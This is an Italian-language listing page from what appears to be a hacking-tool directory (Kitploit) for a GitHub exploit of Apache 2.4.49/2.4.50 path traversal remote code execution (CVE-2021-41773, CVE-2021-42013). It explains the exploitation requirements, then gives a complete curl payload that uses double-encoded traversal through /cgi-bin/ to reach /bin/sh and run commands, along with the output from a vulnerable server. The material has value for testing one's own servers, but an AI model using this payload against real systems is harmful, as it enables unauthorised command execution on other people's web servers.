Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-41773 — Exploit per esecuzione di codice remoto su server Apache. Versioni interessate: Apache 2.4.49, Apache 2.4.50 | Kitploit
Strumenti/GitHubGitHub/mr-exo/cve-2021-41773
RicognizioneGenerazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubmr-exo/cve-2021-41773

CVE-2021-41773

Exploit per esecuzione di codice remoto su server Apache. Versioni interessate: Apache 2.4.49, Apache 2.4.50

Vedi Repository
114 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit RCE sia per Apache 2.4.49 (CVE-2021-41773) che per 2.4.50 (CVE-2021-42013):

IMHO solo configurazioni "particolari" saranno vulnerabili a questo RCE.
Lo stesso vale per gli exploit di "lettura arbitraria di file" che hai visto.

Entrambi i CVE sono in pratica quasi la stessa vulnerabilità di path traversal (il secondo è la correzione incompleta del primo).
Il path traversal funziona solo da un URI mappato (es. tramite direttive Apache "Alias" o "ScriptAlias"). Solo DocumentRoot non è sufficiente.

"/cgi-bin/" è mappato di default (ScriptAlias), ecco perché viene usato prima della stringa di path traversal.
Inoltre, ScriptAlias segna come Exec (per Apache) tutti i contenuti della directory specificata (indipendentemente dalle estensioni dei file).

Requisiti:

1/ mod_cgi abilitato (non di default ma facile)
2/ il binario target deve essere +x (default per /bin/sh)
3/ permessi di Apache concessi per /bin o / (non di default e difficile/irreale)\

Verifica se il server è vulnerabile:

curl 'http://IPADDR/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'

Risposta da un server vulnerabile:

uid=1(daemon) gid=1(daemon) groups=1(daemon)

Scarica lo strumento